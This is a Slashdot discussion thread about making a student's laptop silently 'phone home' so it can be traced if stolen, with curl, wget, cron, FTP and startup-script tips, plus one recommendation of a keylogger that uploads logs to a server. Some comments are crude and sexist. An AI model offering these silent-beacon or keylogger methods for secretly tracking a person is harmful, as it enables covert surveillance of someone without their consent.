Protecting My Daughter's Notebook?

ctwxman asks: "My daughter enters college in the fall. This past week she spent three days on campus for orientation... and had her iPod stolen! That got me to thinking about protecting her brand new laptop. I'll physically lock it to something immovable -- that's simple. However, I've got a website and it's got a log. Is there a way to make her laptop quietly 'phone home' every time it boots so I can get the IP address and always see where it is? Her machine runs XP, but knowing Slashdot, suggestions for all OSes will be appreciated."

Wrong priorities

[Little+Pink+Bunny]

That got me to thinking about protecting her brand new laptop.

You have a naive daughter (who let her iPod get stolen) and you're worried about her laptop computer? You need to be worried about her other laptop unless you want some worse surprises a few months from now ("Him? That's going to be the father of my grandchild?!?").

Good luck, man.

Signed,
Father of two daughters approaching college faster than he wants to admit.

Re:Wrong priorities

[slughead]

You have a naive daughter (who let her iPod get stolen)

I agree but I'll keep it on topic: The best way to prevent theft is to sit her down and tell her to be more careful!

If you think about it, a couple days for orientation is a very short period of time for something to get stolen. Hopefully this iPod thing will get her head straight.

Re:Wrong priorities

[Just+Some+Guy]

Father of two daughters approaching college faster than he wants to admit.

Same boat - I am so not looking forward to that day.

OP: Got a webserver of your own? Why not put the Windows equivalent of "curl http://myserver.example.com/secretpage" in autoexec.bat or whatever passes for a bootup script these days? If the laptop goes missing, watch your server logs like a hawk and get ready to call the police the instant a geographically-identifiable IP makes a request.

Re:Wrong priorities

[general_re]

Maybe he's trying to kill two birds with one stone. You know - "I see that the IP address you had all last weekend belongs to the netblock assigned to the men's dorm. Is there something we should talk about?"

More seriously, there's not much you can do about your concerns, other than hope that you've given them the tools to make good decisions on their own. Of course, that's easy for me to say - my daughter is only six ;)

Re:Wrong priorities

[bhtooefr]

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run?

There's no curl in Windows, but there IS FTP.

Transfers files to and from a computer running an FTP server service
(sometimes called a daemon). Ftp can be used interactively.

FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]

-v Suppresses display of remote server responses.
-n Suppresses auto-login upon initial connection.
-i Turns off interactive prompting during multiple file
transfers.
-d Enables debugging.
-g Disables filename globbing (see GLOB command).
-s:filename Specifies a text file containing FTP commands; the
commands will automatically run after FTP starts.
-a Use any local interface when binding data connection.
-A login as anonymous.
-w:buffersize Overrides the default transfer buffer size of 4096.
host Specifies the host name or IP address of the remote
host to connect to.

Notes:
- mget and mput commands take y/n/q for yes/no/quit.
- Use Control-C to abort commands.

That should do the trick - you just need to have a script that it autolaunches that has "GET .secretfile.txt" and "BYE" in it. Then, you can log all attempts to grab .secretfile.txt, and grap IPs.

Re:Wrong priorities

[Elwood+P+Dowd]

Or he could just install curl or wget.

Re:Wrong priorities

[wolf-]

Man, I read it a little differently.

Dear Slashdot:
I want to know if my daughter is booting up in her dorm or in the frat houses on campus. But I don't want to ask that, so I have concocted this long story:

Dear Submitter:
Grow up. You had 17-18 years to teach your kid to think for herself to stay out of trouble to be responsible for her self and her belongings. Besides, if YOU lock it to a desk and take the key home, she cannot use it in the frat houses. Also, what makes you think she will be using her PC in all those other places???

Re:Wrong priorities

[carrowood]

IIRC, there is a wget in the Microsoft Services for Unix...

Re:Wrong priorities

[mpthompson]

Perhaps those are his priorities. Rather than detecting stolen laptop, he will more likely detect his daughter using her laptop from her boyfriend's apartment at 2 am.

Re:Wrong priorities

[SteveAyre]

Or you can download it here...

http://gnuwin32.sourceforge.net/
http://unxutils.sourceforge.net/

A lot of the other *nix tools are there too...

Re:Wrong priorities

AS this is /. his daughter is probably fat and ugly anyway.

Re:Wrong priorities

[SteveAyre]

Of course for this to work, the laptop'd need a working Internet connection.

If it's stolen, it probably won't get connected to the Internet...

Also because of the logon passwords, probably the first thing that'll happen to it is it'll be reinstalled off a pirated copy of Windows and it'll no longer have the software to phone home.

Re:Wrong priorities

[orn]

That's kind of silly. If you sequestered your daughter away through her teenage years, keeping a tight lock and key on her, then yes, you should be worried about her cutting loose and setting up patterns in college that might be hard to break through the rest of the life.

On the other hand, if you let your daughter be herself and didn't just say "Don't do that," but actually took time to explain why - then you have nothing to worry about. She's an adult and will make adult decisions about the things she wants to do.

As for the iPod, hopefully loosing it teaches her something about how she needs to handle her personal property. I can't think of a big ticket item I had stolen because of my own negligence (which I'm not suggesting the poster's daughter was), but I'm certain there was something that gave me just enough paranoia to hang on to the rest of my belongings. I hope the poster didn't run out and replace it right away...

Re:Wrong priorities

[shadow0_0]

Forgot where I read this from: "Daughters are God's punishment for a man who had sown his wild oats".

Re:Wrong priorities

[jamesh]

One of the likely scenarios being explored here is that the laptop would be stolen by another university student. If the laptop and the university are both wireless capable and the laptop is switched on, it could phone home before being logged in with the right software. Failing that, it would have to be plugged in which a thief who was even remotely clever wouldn't do without checking it out first.

My best advice would be to install a drivelock password, which will render the laptop useless to anyone who doesn't know the password. This functionality is part of the ide drive, and cannot be easily defeated. Replacing the drive in some laptops will result in the password being re-applied to the new drive. If you can't have it, nobody can! (of course, make sure _you_ know the password and store it in a safe place)

Re:Wrong priorities

[mindaktiviti]

Also if you bought her that ipod, don't buy her another one. Let her learn the lesson of keeping an eye on stuff all the time (Unless it was pried from her hands by a ruthless thug).

Re:Wrong priorities

[cerberusss]

get ready to call the police the instant a geographically-identifiable IP makes a request

Yeah, I can see that now:
You: "I'd like to report a stolen laptop."
Police: "What for?"
You: "Well, it's stolen and I know where it is."
Police: "So?"
You: "So I want to report this and then you can retrieve the stolen property."
Police: "Do you have evidence for that?"
You: "I've got logs on my webserver and I've related the IP address to a particular location."
Police: *whimpers* "Yeah, well, have you talked to them?"
You: "What? They stole my laptop, shouldn't you retrieve it and arrest them or something?"
Police: "I'm sorry sir, but we don't have the time for that. We can of course make a statement for you so you can report the incident at your insurance. You ARE insured, aren't you?"

Re:Wrong priorities

[cecille]

that totally happened to me - not with a computer, but with a guitar. Our house got broken into, but thanks to some observant neighbours who noticed the broken window, the cops were there ~30 minutes after my roommate had left.

Now...it's the middle of the day, and with only 30 minutes to spare, you have GOT to figure that someone was waiting for everyone to leave. Well...the neighbours kids were hanging around the front of the house before my roommate left, and one of the neighbours had noticed them running though the back yard around about 30 minutes later. In fact, the theives even went so far as to leave a nice bottle of cola on the table for us, probably ripe with sweet fingerprints. But the kids never got questioned, and the bottle never got processed. In fact, the cops sat around our house for a full 40 minutes waiting for my roommate to get home and never even went out to ask any of the neighbours if they saw anything. They just gave up and said they would probably never find anything. Even after they CASHED MY PAYCHECK...nothing.

Same thing happened to my friend whose porch got lit on fire. Cops blamed it on vandals, but only after they accused him several times of doing it on his own, even after he explained several times that he could not have possibly lit his porch on fire given that he was not in the city at the time. Same thing there - never talked to anyone, just told them they sure hoped they had good insurance.

Kids got lucky though - not from the cops, but from me. Didn't so much care about the guitar (jokes on them though - the guitar was cheap, but they passed on the petal next to it that was very portable and very decent), didn't even really care about the paycheck (not a big one - part time job, $280 or so). But if they had messed with my computer, I think I definately would have done something more drastic.

Re:Wrong priorities

[ottothecow]

well, if it is stolen on a college campus, it probobly WILL get connected to the internet. Either the campus wireless as soon as its turned on or the theif will turn it on and plug it in back at their dorm room. That said, I agree that its too hard to make it phone home like that (maybe if it was on: connect rather than on: boot).

The best thing to do would be to make sure that the MAC address of every single networking device in the system is written down where you can find it and again where she can find it (and registered with the university if they offer). The university knows its own network and has managed networking hardware so if you can provide the MAC address of the system, they can monitor it and know exactly what port it is connected to (or hotspot it is in). It is simple from that point to send in the campus police to knock on the door of Room 302 of McThiefy Hall. The added bonus of this plan is that it still works when the first thing done to it is a reformat.

Thats the best I can provide (as another student entering the class of 2009) so I hope it isnt hidden to deep in the comments to be seen.

Re:Wrong priorities

[ottothecow]

I supose I should also add that if they do connect to the university network and you get an IP from whatever method, it is probobly going to look just like one of the IPs your daughter usually gets.

"Dear, I think I found out where your laptop thief is!!!"
"Where dad?"
"From his IP, it looks like he is at the University of BigState"
"Dad..."

Re:Wrong priorities

Cashed your paycheck?

What 3rd world country do you live in?

Re:Wrong priorities

[cecille]

...canada

Re:Wrong priorities

I like fat and ugly, I did your mom last night.

Re:Wrong priorities

[jrockway]

Then you call the cops and the University turns over the IP logs. And you know which room it came from.

At my school, you have to log in with a valid username and password via 802.1x before packets will be routed for you (be it wired, wireless, or in the dorm room). They would have the name of the person who took it. That's probably enough to get it back :)

Re:Wrong priorities

[jrockway]

Most people aren't concerned about using their computer when they can be having sex instead.

Oh no, she was doing homework with a guy friend. Maybe even her BOYFRIEND! Heaven forbid!!!!

Re:Wrong priorities

[ottothecow]

Ah, that would make it easier to track. At UChicago, the username/password is only needed for wireless connections (though if its a dorm room jack, its one of two people...)

Another smart thing to do is engrave your name and a drivers license number or something else identifiable and traceable into all electronics. Severely scratched out rectangles are usually a sure sign of stolen goods.

how about....

[AresTheImpaler]

how about protecting your daugjter? you know, there are a lot of bad people at the universities. D:

Re:how about....

how about protecting your daugjter?

She's fine. She's locked to me :)

Insurance

[Profane+MuthaFucka]

You can't prevent theft, and you might not be able to track it down.

But, you *can* get a rider on your insurance that will cover theft of the laptop.

That, and backups of whatever term paper she's currently working on kept in a separate place, is what you need.

Re:Insurance

[Profane+MuthaFucka]

Oh, and one more thing:

Tell you daughter the tale of Libby Hoeler. http://www.google.com/search?biw=1331&hl=en&q=libb y+hoeler&btnG=Google+Search If your laptop is stolen, lots of private things become public.

Re:Insurance

[c0reboarder]

insurance is a great idea... as far as tracking the IP that should be doable... but where do you want to know where it is? what city? what building? Most universities spoof IPs so figuring out the exact location isn't going to happen. It sounds more like you're worried about where she is/spying on her then the security of the laptop. Insurance will take care of that. As far as spying on her, she's going to college, this happens, you should be happy for her and let her go as hard as it is.

subject goes here

[Weh]

uh, you want your daughter's laptop to "phone home". Are you not just a jealous dad?

Not caring if it gets stolen...

[david.given]

...is the simplest solution. I mean, these are students. She's in the highest risk category for having electronic devices stolen. Giving her a brand new, high-spec laptop is madness.

What does she want it for? Could she, for example, make do with a low-spec laptop worth a few hundred currency units of your choice, rigged up as a thin terminal to a higher-spec but secure machine somewhere else? This would be ideal for doing actual work; small and portable at the human end, large and capable (and backed up) at the machine end.

This way, the human end is undesireable and unlikely to be stolen. And if it is stolen, it's cheap to replace and all documents will be preserved.

Re:Not caring if it gets stolen...

[nuggetman]

What does she want it for? Could she, for example, make do with a low-spec laptop worth a few hundred currency units of your choice, rigged up as a thin terminal to a higher-spec but secure machine somewhere else? This would be ideal for doing actual work; small and portable at the human end, large and capable (and backed up) at the machine end.

You're joking, right? You actaully expect this guy to set his daughter's laptop that she's going to have at school as a thin client? That may be great for a local network but a) many universities have very restrictive firewalls and b) that'd be painful as hell over the regular internet

Re:Not caring if it gets stolen...

[Picass0]

Many decent schools now require a laptop for all students. My niece is going to study medicine at Creighton University this fall, and they have a standard system with pre-configured software that they want their students to use. If you use their system, you will match the schools requirements for firewall, virus detection, etc... and therefore be a trusted agent on the college Wifi.

Buy someone else's machine, no Creighton network or internet for you!

Re:Not caring if it gets stolen...

[ivan256]

Don't you mean:

If you use their system, you will match the schools requirements for recieving kickbacks from the hardware vendor.

Re:Not caring if it gets stolen...

[CharlieG]

Another trick = 'It's your laptop - it gets stolen YOU are going to replace it out of your money, not mine"

Remember - ownership = buy-in = taking care of said item

OS X solution

[Matt+Clare]

I've got this on my PowerBook

% crontab -l
1 * * * * nice -n 19 curl -sfA 'PowerMatt' -o /dev/null <a href="http://www.mattclare.ca/the_url_i_chose/">ht tp://www.mattclare.ca/the_url_i_chose/</a>

But, where's the cron system in XP????????

Re:OS X solution

[an_mo]

start/all programs/accessories/system tools/scheduled tasks

alternatively, you can install cygwin and cron as a service; it works well for me

Re:OS X solution

[bhtooefr]

It's called Scheduled Tasks.

Re:OS X solution

[TykeClone]

Wimp. Do it from the command line with at

(a command that sucks to use, by the way)

Re:OS X solution

[Matt+Clare]

I don't know why I'm a Troll. I know the question was about Windows XP and I gave a UNIX answer, but I thought on a place like Slashdot a UNIX/Linux/OSX based answer might be appreciated anyway. I guess not.

I know XP has no cron system, I was being facisious about the fact that I didn't directly answer the question.

In fact, I even got an E-Mail asking about how this technique works. What follows is my responce to this slashdot reader:

I am curious, i'm soon to buy a Powerbook with interest of delving deeper into OSX than what the iMacs and Powermacs on my campus (www.purdue.edu) will allow me to do, and saw your blurb on the laptop security. I was hoping you'd give me a brief explaination of what's goign on there, i understand you're quietly appending a text file, but not sure with what and to what end. I would like to employ a similar setup with my system, that's why i'm asking :)

Here's what I had to share:

I got this running a few years ago, but I saw it in 2600 Magazine about 3 issues ago. The basic idea os your machine automatically calls up a web site with a unique name every hour. If your Laptop gets nicked you can hopefully check the logs on your server and trace it back to an ISP and hopefully they can tell you who has your laptop. That might not work so well, so what I would do is try to regain control over it while it's online -- I may not be able to get it come back to me like professor Frink's autodialer, but I can at-least erase my files (another tip - turn on filevault) and use the say command to taunt the guy (you can type ' say go to hell ' in the terminal and the Mac will say whatever you tell it to).

OSX is the best part about a Mac, and one of it's best features is it's base of a UNIX-type operating system, named Darwin. UNIX/Linux/FreeBSD/Darwin all make use of a number of common, free, open source, tools for the basics of the operating system. One of these tools that all UNIXs share is a tool called cron that is used for scheduling tasks. Each user can schedule tasks, so long as they can edit their 'crontab' with the proper syntax. Here's more info on cron: http://en.wikipedia.org/wiki/Cron

One thing you will need, as the writer on Slashdot implied, is a web site with access to the logs. These logs show you who visited, the IP number, and what web browser they used. Without another machine with a web server, with logs you can read, this won't work.

OK, so you've got your new shinny PowerBook setup and every thing else. Open the Terminal (Spotlight can find it for you) and type:

crontab -e

(for edit the crontab - in my example I fed in the -l for list my crontab )

Note - if there is no menu on the bottom read the *

Now you need to enter when this is to run, using the ancient standard for cron tabs: minute, hour, day of the month, month, day of the week. You can use wild cards like * to mean anything in this field is OK. So for the first minute of every hour forever enter:

1 * * * *

after the time you need to enter in the command you want, in this case we want to use curl, a tool for getting files off the web. We want to tell it -s for be silent -f for fail silently and -A for append user agent, this is so you can have in your web server logs a user agent you'll notice - like "My Laptop", or in my case, "PowerMatt" and just to make this all REALLY silent, -o to send the output to the null device at /dev/null. You want this to execute silently so you don't logs full of curl's output. The last field is the URL to hit, so make someplace on your website that'll be unique. That ONE line entry in your crontab should look like this now:

1 * * * * curl -sfA 'My Laptop' -o /dev/null <a href="http://www.mattclare.

Can you program?

[wishus]

It should be fairly trivial if you can program. You can even get a free perl interpreter (ActivePerl or something) if you don't have VisualC++ or somesuch. Put your program in the startup folder, or as a scheduled task.

The simplest would be to make a secret webpage for her and set that as her homepage in IE. Although that is trivial to change, whoever steals it (or buys the stolen thing) will probably boot it up and start IE, hitting your web page.

Re:Can you program?

[Jjeff1]

Heck, you don't even need to program.

Get a copy of Wget for windows and put it in the startup group with the address of your web site, like so...
wget http:/// mysite.com/laptop.htm
that should hit your site and download the file whenever the system is booted.
For more fun, use Srvany and run the little script above as a service. This way the crooks don't even need to login for it to work.

Re:Can you program?

[coolmadsi]

The simplest would be to make a secret webpage for her and set that as her homepage in IE. Although that is trivial to change, whoever steals it (or buys the stolen thing) will probably boot it up and start IE, hitting your web page.

I think it might be possible to have IE open or run when the computer first starts up, it happens on one computer in my old school when anyone logged into the network on that single computer, it would probably be better to saving the webpage as a favourite and launching that file as opposed to running the program IE to the default homepage because if the homepage changes, anything implimented will go wrong.

I have seen a USB device that, when the user walks away (if they have a special key ring or something attached to them) the computer locks and doesnt unlock until the user comes within a certain range.

I read somewhere (probably slashdot actually) that iPods are more likely to be stolen then most other things.

Also, why chain a laptop to a table? Wouldnt it be a lot easier to get a desktop PC and chain that? It will be a lot harder to physically move and larget chains can be applied, then all you need is a really cheap laptop that can run Linux an OpenOffice or something, so that any work done on the move (laptop) can be moved to the desktop and saved, if you wand a back up then i suppose you could always email files as attachments, even using Gmail, most prople could probably store quite a lot of work just on one gmail account.

Really Simple Idea

[buelba]

This is simple but eventually they can hack around it:

1. Set up a subdirectory on your Web page, say "foo.com/google/" that directs to google.com.

2. Set up her homepage as foo.com/google. Don't tell anyone else about foo.com/google.

3. When the thieves boot up the PC and get on the Web, they'll automatically go to foo.com/google and, hopefully, won't even notice the redirect. You'll get at least one hit and maybe more.

The down side is that your daughter will trigger these logs too. (That'll happen with pretty much any technique you use, though.) Promise us that you won't go checking on her surfing times.

Re:Really Simple Idea

[menscher]

I've done basically the same thing for some customers -- I set their browser homepage to my site, which just instantly redirects them to their desired homepage. The user doesn't notice any delay, or even remember I'm doing this. But if his laptop is ever stolen, I can start watching logs for connections.

On the linux side I have it wget that page as part of the init scripts. So if it boots when attached to the network, it will phone home.

Obviously this doesn't protect against thieves that wipe the drive before going online. But I think most casual thieves wouldn't, since then they'd have to reinstall Windows, Office software, etc.

Been doing this for years... hardly anything new or exciting. And no, I don't spy. Seeing how often he opens a browser or goes to his home page isn't exactly interesting info anyway.

Re:Really Simple Idea

[cwebb1977]

Problem is, Google is gonna see the referrer and send the bot. Then it's a URL you can probably find in google...

Re:Really Simple Idea

[menscher]

First of all, the page redirects him to a page he wants as his homepage, not to google.

Second of all, it really doesn't matter if google finds the URL. When the laptop is stolen, it's pretty trivial to filter out "googlebot" from the browser strings. Or do you really think people are going to google for "... I really can't imagine any search terms to put here" and then follow the link, causing false positives at just the time the laptop is stolen?

Re:Really Simple Idea

[telecsan]

Problem is, Google is gonna see the referrer and send the bot. Then it's a URL you can probably find in google...

that's why there's a robots.txt

Nope, that won't do it

[paranoos]

People who steal laptops know enough not to boot them up. A lot of people's computers have MSN and AIM and what have you running on startup.

A friend of mine had their laptop stolen once, and I saw them come on MSN. I wrote down the IP address, only to find out that it was my friend logging in from their home PC.

In short, if you steal a laptop, you either wipe the hard drive, or bypass the boot process with a CD to snoop around at data.

Get your daughter a proximity alarm, so if she walks away from the laptop, or if it's grabbed from her, a loud alarm sounds.

Re:Nope, that won't do it

[blackicye]

or the easiest option:

c) don't connect to the internet..

Re:Nope, that won't do it

[electrofreak]

That'll be kind of embarrassing when she simply gets up to use the restroom.

Re:Nope, that won't do it

[mopslik]

In short, if you steal a laptop, you either wipe the hard drive, or bypass the boot process with a CD to snoop around at data.

Or simply disable all network access points by popping out the network/wireless card. Easy as pie.

Re:Nope, that won't do it

[MattWhitworth]

Ah, but then you would password the BIOS screen so you couldn't boot from CD unless you knew it.

Re:Nope, that won't do it

[bcmm]

And how did you get their IP address using MSN? AFAIK, all connections except voice, video and file transfer go through MSN's servers.

(This would actually be useful for me as well as interesting as I sometimes have to help friends with their computers, and a lot of semi-computer literate people are far too sure that their IP address is whatever ipconfig or whatismyip.com says it is).

P.S. Seems whatismyip.com has started detecting proxies sensibly, so maybe that's a bit more usefull now.

Hmmm

[kenp2002]

HI I'm a budding spyware author and I am too uninventive to actually create my own spyware so I was wondering if you slashdot people have any suggestions on how to help track users.

You see what I want to do is quietly create some spyware that will dial back home every time it boots so I can track infected users... Hahah.. I meant to say loyal customers. Heheh... I love saying that...

No No don't worry about giving me suggestions, we'll cook up a crappy excuse to explore spying techniques so you can give a spyware creator suggestions without actually looking like your helping us here at MyPrincessLaptopSecurity.Com

PS: Please visit my web site to bump up the traffic, my ads aren't getting enough hits...

WTF!! Which editor needs to be sacked for this shit? COME ON ALREADY!!! Haven't we suffered through enough Star Wars commericals... errr... stories... Now this shit... TACO FIX YER SHIT!

Try a boot-up password

[Trepalium]

Most boot-up passwords on notebook computers can not be cleared except by the manufacturer (or by highly motivated thieves who know an awful lot about electronics). There's no CMOS battery to pull to wipe out the password, and even if you could, there's still the password on the hard drive. This simple measure means getting the laptop into good enough shape to sell is more effort than it's worth.

My other suggestion is insurance. It shouldn't cost too much ($50/yr) and it'll cover theft. I had my laptop stolen once, and it was insured, so I replaced it easily. Not only that, it was quite easy to deal with the insurance folks (no horror stories here!).

Besides, even if you know what IP it's coming from, what goes does that do you? Are you going to go vigilante on them? The police aren't likely to care much -- they don't usually give such thefts very high priority.

Re:Try a boot-up password

[TeknoHog]

This simple measure means getting the laptop into good enough shape to sell is more effort than it's worth.

I've thought about this with regards to my own laptop(s), but there's just one problem: How do the thieves know about the passwords in advance? Anyone looking for a quick buck will just take the laptop, then curse the password protection later. In other words, I don't think it gives any protection against theft.

On the other hand, it's a nice layer of security when talking about data privacy. Until you take the hard drive off to another machine, of course.

Re:Try a boot-up password

[Trepalium]

How do the thieves know about the passwords in advance?

They don't know about it, but that means they stand a greater chance of being caught with the machine when they either take it into a repair shop to get the password removed, or try to sell it somewhere. There is a better chance of recovering the machine, and having the person responsible for stealing it being caught. If the person who stole it is smart enough to try and start up the machine before getting rid of it, then there's a good chance it'll end up in the nearest dumpster.

Until you take the hard drive off to another machine, of course.

Most recent laptops make use of the ATA locking feature when you set a start-up password to make the hard drive inaccessable until your password is given. According the the hard drive vendors, the only way to clear the password is to send it the command to wipe the drive. Data recovery places say they know how to get around the passwords, though [and they're not saying how they do it, either :-( ].

Re:Try a boot-up password

[KD5UZZ]

1. Remove (password protected) drive electronics from the drive.
2. Replace with drive electronics designed to recover data (sometimes provided by the vender?)
3. Recover Data
4. Profit!!

Re:Try a boot-up password

[cloudmaster]

How do the thieves know about the passwords in advance?

Handheld label printers are pretty cheap now... Then again, so is "tell your daughter that she needs to pay attention to the expensive, easy to steal items".

Responsibility

[Apreche]

Teach your daughter to be responsible. I can tell you every laptop stolen in college was someone being irresponsible. They left their dorm rooms unlocked with laptops out on desks not locked to anything. They would leave laptops unattended in the library for a few minutes while they went to get coffee. Nobody is going to steal her laptop out of her hands or out of her backpack while she's wearing it. If your daughter was more responsible with her belongings they wont get stolen. Any tech solution you have to find it after it gets stolen is unecessary if your daughter takes care of her things.

Re:Responsibility

[Mad_Rain]

Teach your daughter to be responsible. I can tell you every laptop stolen in college was someone being irresponsible.

That's all well and good to teach your child to be responsible - but good luck having a college roommate who is also responsible. It's good to have that extra layer of security anyway. :)

Re:Responsibility

[vwjeff]

As a college student, here is my advise.

1. Make a habit of locking your door. Even if you are only going down the hall to the bathroom.

2. Do not keep valuable items out in the open.

3. You are responsible for your property; not your room mate, not your RA.

4. Do not lend expensive and/or hard to replace property. It is amazing how fast someone can disappear on campus.

With that being said, your daughter needs to learn how to keep track of her own property. It is not your responsibility as her father to look over her back. She needs to learn on her own. Part of the college experience is becoming independent. Tell her if the laptop is stolen, she is responsible for buying a new one. It's tough but that is the real world.

The best thing you can do as a father is to let her make mistakes even if that is a $1700 mistake. Before going to college my parents told me basically the same thing I am telling you. Lock your doors, keep expensive items hidden if possible, etc. My Freshman year, I didn't listen and left my door unlocked. I went down two doors and watched TV with some of my friends. A half an hour later I returned to my room where my room mate had been sleeping the entire time. I went for my Palm Pilot to check my schedule and to my suprise it was gone.

Re:Responsibility

[unitron]

"4. Do not lend expensive and/or hard to replace property. It is amazing how fast someone can disappear on campus."

Don't lend anything you want back. Period. Assume that that anything you loaned you actually gave away. Do not expect to be pleasantly surprised.

Re:Responsibility

[bill_mcgonigle]

They would leave laptops unattended in the library for a few minutes while they went to get coffee.

Right, because you should have to shutdown your machine and chain it to a wall if you have to go pee. Let's try using the community rather than running scared from it.

Since this is a girl we're talking about she can go up to any guy at a nearby table and say, "hey, keep an eye on my laptop, K?," with a nice smile and there won't be any trouble.

Re:Responsibility

[bill_mcgonigle]

1. Make a habit of locking your door. Even if you are only going down the hall to the bathroom.

It's no good to live scared.

If you're really concerned, for $40 you can get an NTSC color video surveillance camera at Sam's. Hook it to your computer if you're geeky enough or a discarded VCR from a yardsale.

Now you can go sit on the pot without having to bring you keys. If you find something is stolen you'll have evidence and you can either a) kick the shit out of the thief or b) turn him in.

Plus you don't have to worry about fishing your keys out of a shitty pot if you drop 'em.

Re:Responsibility

My laptop (and camera stuff, identity documents, and some other important things) were stolen from my closed closet in my locked dorm room. http://www.upenn.edu/ isn't exactly a low-rent school, either. Part of being careful is not making unnecessary assumptions or generalizations.

Re:Responsibility

Since this is a girl we're talking about she can go up to any guy at a nearby table and say, "hey, keep an eye on my laptop, K?," with a nice smile and there won't be any trouble.

How naive are you? No, don't answer that. It's painfully obvious.

Re:Responsibility

[Glonoinha]

It's no good to live scared.
Hah - that's funny.*

Get one of those cable locks with the dongle that goes into the 'lock hole' in the laptop and tell her that if she isn't actively transporting it between places, it is to be securely fastened to something too big to move. Library, friends's house, in the dorm, wherever - if she isn't carrying it somewhere it gets secured. She doesn't have to make it unstealable, just harder to steal than someone else's laptop. (That was the 'informative' part of this post.)

Keeping your stuff isn't about identifying the perp after the fact. It is about securing your stuff from theft in the first place. (That was the 'insightful' part of this post.)

And a little 'scared' goes a long way towards living a very healthy, secure life.

*I'm not going to say that sleeping with a loaded pistol under the pillow is for everybody, but it has always worked for me.
Come to my house without calling first and rest assured that the hand you don't see (behind the door) has a pistol in it ready to shoot you through the door.

Re:Responsibility

[bill_mcgonigle]

And a little 'scared' goes a long way towards living a very healthy, secure life.

Secure, probably. Hypertensive? - maybe.

Look, I've got a conceal/carry permit myself, I'm all for defending your family and property, but I think the difference is I don't assume a knock on the door is someone who's there to kill me - it's probably my neighbor seeing if he can borrow a tool. If the guy through the peephole is unknown my ears may go up, but it might be the UPS guy or a Mormon. If the guy is ramming the door with his shoulder he's getting a world of hurt.

There's no doubt the approach you describe is more secure. What's important though isn't whether it's more secure, it's whether it makes you more safe. If you're always on edge worrying about it your arteries are going to feel like schedule 40 PVC after a decade or two and that's very unsafe. Security is largely an odds-game, and it's important to defend against the best-odds threats.

Do an attack-tree analysis of things that can kill you, and a violent intruder is probably not going to be near the top of the list. Still, be prepared for the holdup at McDonalds - just don't fret about it when you walk in.

Cron and Curl

Oh, come on.

In six easy steps, why don't you just:

(1)Write a PHP/Perl/WhatTheFuckEver/etcetera script that sends a specially formatted message to a system log.

(2)Install a real operating system (like, say, Ubuntu).

(3)Create a cron job that regularly accesses said script with Curl/wget/WhatTheFuckEver/Etcetera.

(4)???

(5)Profit!

(6)Send another ultra-simple 30-second software engineering question to Ask Slashdot.

What, did you want a >4MB .NET tray icon app that installs ~5 ad-ware programs? Sorry, I like elegant solutions.

(sorry, I'm in a bad mood because of MGM v. Grokster)

Re:Cron and Curl

[telstar]

(2)Install a real operating system (like, say, Ubuntu [ubuntulinux.org]).

Yeah, 'cause I'm sure his daughter's Math 101 class will be using software written for use with Ubuntu. Face it ... as much as Linux may be the solution for you, for mainstream college freshman, it's still not the right solution.

Re:Cron and Curl

[poopdeville]

Oh god, if Math 101 requires any software to be installed, she should just transfer to a better school. The only software a mathematician needs is LaTeX. A computer mathematics package might be useful for formulating conjectures though.

Re:Cron and Curl

[Quattro+Vezina]

What college are you going to where basic math classes require installed software?

So far, I've never had an issue with using Linux in any class I've had. In fact, having LaTeX has massively helped me with some of my classes.

iPod theft...

[rthille]

I talked to my friend at Apple and suggested that they add some software to the iPod and iTunes so that you can require a password whenever you dock the iPod. If you can't supply the password then the iPod locks up and phones home.
He thought it was a good idea, but he's sort of a flake, so who knows if it's something they'd ever do.

Timbuktu

[Hungus]

Since you asked about something that would phone home I would suggest Timbuktu from Netopia. There was a story a few years ago about how a brother recovered his sister's stolen computer by using its phone home functionality.

Have a pic of your daughter?

If she's cute, I'm sure that most good-natured slashdotters will gladly look in on her quite often.

MOD PARENT UP!

Insightful as fuck... Plus Libby is one hot bitch. :)

Re:mod parent up!

[mysidia]

Then set a BIOS password and set a hard drive password to block access to the configuration, and make the CD-ROM non-bootable... nope, no pirate copies of XP here.

For bonus points, set a hard drive password and/or put a boot image on the network card itself that silently connects to the network, phones home _And THEN_ boots the OS.

Re:mod parent up!

yeah but then you and or the daughter would probably forget the passwords, and encounter problems like... when shes at school and it crashes (windows does this often enough) and she needs someone perhaps a friendly nerd to do a rescue from a bootable cd... and she doesnt remember the pass so he cant fix it.. and the bios wouldnt help either... and on another note, you cant phone home if the modem isnt plugged in.... and i havent plugged anything into my modem in AGES... so i suppose you dont really mean to "phone" home... Phoning the police or 911 (well emailing them or something) would be much more interesting though. with a big flag like I am stolen lol i like the solution, but for the daughter away at college im uneasy, unless she keeps the password somewhere such that she WONT forget it.

Key Logger that phones home

[cnmsales]

Ive got a key logger installed on my PC that allows for the log files to be uploaded to an FTP server should I choose it to. I would guess this would allow you a very large amount of data on the would be thieves. Perfect keylogger by blazing tools is the one I use.

So lemme get this straight.

[pclminion]

You want to install a piece of software on your daughter's computer so you can always know where it (and by extension, she) is? Are you sure your true motivation is really preventing the theft of the laptop?

She lost the iPod because she wasn't careful. If she can't be responsible with that, I think you've got bigger problems. She might also lose, say, her status as a non-pregnant person.

If you paid for the laptop, and you think there's a large chance she'll allow it to be stolen, don't let her take it! If she paid for it herself, let her learn the painful lesson herself. Either way, I see no need for this tracking software.

Following her around and making sure she never makes a mistake is only going to hurt her, not help her.

Re:So lemme get this straight.

[Holi]

Jesus christ, How do you go from someone having something stolen (especially something as desirable and easy to take as an ipod) to someone who is so carteless that she'll go out and get pregnant by the first guy she lays eyes on. Where do you get off on insulting a parent like that, are you stupid or juat a misogynist bastard.

Pardon my rough language but it was no more then your attitude deserved.

Re:So lemme get this straight.

[SPY_jmr1]

It may be what he deserved, but it did not make his point any less truthful.

So sayth the careful observing college student.

Re:So lemme get this straight.

[fjf33]

Why would he want to do that? It seems to me, he is just trying to help her secure her laptop. Of course you could say let her loose it since you wouldn't buy her one to replace it. Part of the learning process, and if she needs the laptop for a class. Well tough love and another lesson learned. I guess a belting now and then would teach her a lesson too uh?

Re:So lemme get this straight.

[agraupe]

My question is how she lost her iPod. I keep mine in my pockets at all times, and if, for example, I have to change at the gym or whatever, I lock it up. I mean, if it was a pickpocket, I'll understand, but in that case I wouldn't worry about my laptop, as you would notice that missing quite a bit sooner. I think the truth in this case might be that his daughter isn't responsible enough to have nice things at this point. Although, as with your comment, I don't think this necessarily translates into getting pregnant at the first opportunity. Although it might.

Re:So lemme get this straight.

[pclminion]

